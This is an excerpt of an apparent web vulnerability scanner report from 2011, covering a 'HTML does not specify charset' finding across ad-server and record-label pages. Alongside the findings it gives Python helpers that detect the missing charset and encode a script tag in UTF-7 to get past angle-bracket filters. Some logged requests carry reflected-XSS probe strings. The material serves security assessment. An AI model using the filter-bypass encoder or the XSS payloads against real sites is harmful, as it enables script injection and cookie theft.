...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...

24. HTML does not specify charset
There are 33 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
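
Two added helpers (example code written for this page, not part of the report): the first inspects a Content-Type value the way a scanner would and flags HTML responses that carry no charset, which is exactly what the DCLK-AdSvr responses below send. The second is a small UTF-7 encoder, written here rather than taken from a library, that shows why the missing charset mattered: the encoded payload contains neither < nor >, so a filter that looks for those characters passes it, while a UTF-7 decoder (Python's codec stands in for a sniffing browser) turns it back into the original script tag. Caveat: browsers that follow the WHATWG Encoding Standard do not support UTF-7 at all, so this particular bypass is historical; the check remains worthwhile because charset sniffing and mismatched legacy encodings still change how markup is interpreted.

```python
import base64


def charset_of(content_type: str):
    """The charset parameter of a Content-Type value, lower-cased, or None when it is absent or empty."""
    _, _, params = content_type.partition(";")
    for param in params.split(";"):
        name, _, value = param.strip().partition("=")
        if name.strip().lower() == "charset" and value.strip():
            return value.strip().strip('"').lower()
    return None


def html_without_charset(content_type: str) -> bool:
    """True for an HTML response whose Content-Type leaves the browser to guess the encoding."""
    mime = content_type.partition(";")[0].strip().lower()
    return mime in ("text/html", "application/xhtml+xml") and charset_of(content_type) is None


# RFC 2152 set D plus the whitespace that may be sent directly; everything else is base64-shifted.
UTF7_DIRECT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:? \t\r\n")


def utf7_encode(text: str) -> str:
    """Strict UTF-7: optional-direct characters such as < > " are always shifted, so they vanish from the bytes."""
    out, run = [], []

    def flush():
        # Emit the pending non-direct characters as one '+<base64 of UTF-16BE>-' shift sequence.
        if run:
            b64 = base64.b64encode("".join(run).encode("utf-16-be")).decode("ascii").rstrip("=")
            out.append("+" + b64 + "-")
            run.clear()

    for ch in text:
        if ch == "+":
            flush()
            out.append("+-")          # a literal plus sign is written as '+-'
        elif ch in UTF7_DIRECT:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out)


def utf7_decode(encoded: str) -> str:
    """What a UTF-7-sniffing browser would render; Python's codec plays that role here."""
    return encoded.encode("ascii").decode("utf-7")


if __name__ == "__main__":
    for ct in ("text/html", "text/html; charset=UTF-8"):
        print(repr(ct), "-> needs charset" if html_without_charset(ct) else "-> ok")
    payload = "<script>alert(1)</script>"
    wire = utf7_encode(payload)
    print(wire, "->", utf7_decode(wire))
```

A filter that rejects < and > in the reflected value never sees them in +ADw-script+AD4-alert(1)+ADw-/script+AD4-, which is why a charset declaration belongs in the Content-Type header itself: a meta tag inside the body arrives after the browser has already started guessing.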


24.1. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=;sz=728x90;ord=b1615b20a4? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 38714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...

24.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=;sz=300x250;ord=3d088ae512? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38825
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:08:48 GMT
Expires: Mon, 09 May 2011 14:08:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...

24.3. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...

24.4. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;~cs=f
Date: Mon, 09 May 2011 14:00:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1183

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

24.5. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="htt
...[SNIP]...

24.6. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

24.7. http://asthmatickitty.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...

24.8. http://asthmatickitty.com/news.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...

24.9. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: client_id=1ABD9ECB0C477772232F73DDC019AC3839B64C9B

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:15 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Connection: Keep-alive
Content-Length: 9768

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...

24.10. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: client_id=1ABD9ECB0C477772232F73DDC019AC3839B64C9B

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:15 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Connection: Keep-alive
Content-Length: 8445

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...

